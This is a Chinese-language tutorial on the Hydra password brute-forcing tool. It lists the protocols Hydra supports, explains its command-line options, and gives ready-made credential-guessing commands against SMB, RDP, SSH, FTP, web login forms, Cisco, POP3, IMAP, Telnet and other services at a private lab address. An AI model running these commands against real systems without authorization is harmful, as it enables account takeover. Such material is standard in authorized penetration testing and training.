什么是 Hydra?
Hydra 是一个暴力破解工具,使用弱口令字典进行爆破。
Hydra 支持的协议
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| Asterisk、AFP、Cisco AAA、Cisco auth
Cisco enable、CVS、Firebird、FTP
HTTP-FORM-GET、HTTP-FORM-POST
HTTP-GET、HTTP-HEAD、HTTP-POST
HTTP-PROXY、HTTPS-FORM-GET
HTTPS-FORM-POST、HTTPS-GET
HTTPS-HEAD、HTTPS-POST
HTTP-Proxy、ICQ、IMAP、IRC、LDAP
MS-SQL、MYSQL、NCP、NNTP、Oracle Listener
Oracle SID、Oracle、PC-Anywhere、PCNFS
POP3、POSTGRES、RDP、Rexec、Rlogin
Rsh、RTSP、SAP/R3、SIP、SMB、SMTP
SMTP Enum、SNMP v1+v2+v3、SOCKS5
SSH (v1 and v2)、SSHKEY、Subversion
Teamspeak (TS2)、Telnet、VMware-Auth
VNC、XMPP
|
Hydra 使用(命令行)
| 参数 |
用途 |
| -l |
指定单个用户名,适合在知道目标用户名的情况下使用 |
| -L |
指定多个用户名,适合字典爆破 |
| -p |
指定单个密码,适合在知道密码的情况下使用 |
| -P |
指定多个密码,适合字典爆破 |
| -C |
当用户名和密码存储在同一个文件时使用此参数,文件格式必须是【用户名:密码】 |
| -M |
指定多个攻击目标,文件格式必须是【地址:端口】 |
| -t |
线程数(默认为16) |
| -s |
指定端口,适用于目标端口非默认的情况下使用 |
| -S |
指定爆破时使用 SSL 链接 |
| -R |
继续从上一次爆破进度继续爆破 |
| -vV |
显示爆破详细信息 |
| -o |
输出文件 |
| -f |
一旦爆破成功一个就要停止爆破 |
| -e |
可选项,n:空密码探测,s:使用指定用户名和密码试探 |
| server |
代表需要攻击的目标(单个) |
| service |
爆破时使用的协议 |
| OPT |
爆破模块的额外参数,可以使用 -U 参数来查看模块支持哪些参数 |
使用案例
爆破 smb
1
2
3
4
5
6
7
8
|
hydra -L user.txt -P pass.txt -V 192.168.150.144 smb -o smb.log
hydra -l root -P pass.txt -V 192.168.150.144 smb -o smb.log
hydra -L user.txt -p 123456 -V 192.168.150.144 smb -o smb.log
|
爆破 rdp
1
| hydra -L user.txt -P pass.txt -V 192.168.150.144 rdp -o rdp.log
|
爆破 ssh
1
| hydra -L user.txt -P pass.txt -V 192.168.150.144 ssh -o ssh.log
|
爆破 ftp
1
| hydra -L user.txt -P pass.txt -V 192.168.150.144 ftp -o ftp.log
|
get 方式登录,爆破 web 登录
1
| hydra -L user.txt -P pass.txt -vV -e n -f 192.168.150.144 http-get/admin/index.PHP
|
post 方式登录,爆破 web登录
1
| hydra -L user.txt -P pass.txt 192.168.150.144 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
|
爆破 HTTPS
1
| hydra -m /index.php -l username -P pass.txt 192.168.150.144 https
|
爆破思科
1
2
| hydra -P pass.txt 192.168.150.144 cisco
hydra -m cloud -P pass.txt 192.168.150.144 cisco-enable
|
破解 teamspeak
1
| hydra -L user.txt -P pass.txt -vV 192.168.150.144 teamspeak
|
破解 pop3
1
| hydra -L user.txt -P pass.txt my.pop3.mail pop3
|
破解 http-proxy
1
| hydra -L user.txt -P pass.txt http-proxy://192.168.150.144
|
破解imap
1
2
| hydra -L user.txt -P pass.txt 192.168.150.144 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
|
破解 Telnet
1
| hydra 192.168.150.144 telnet -L user.txt -P pass.txt -e ns -f -V
|
reference
【经验分享】Hydra(爆破神器)使用方法
爆破工具 Hydra 简单使用
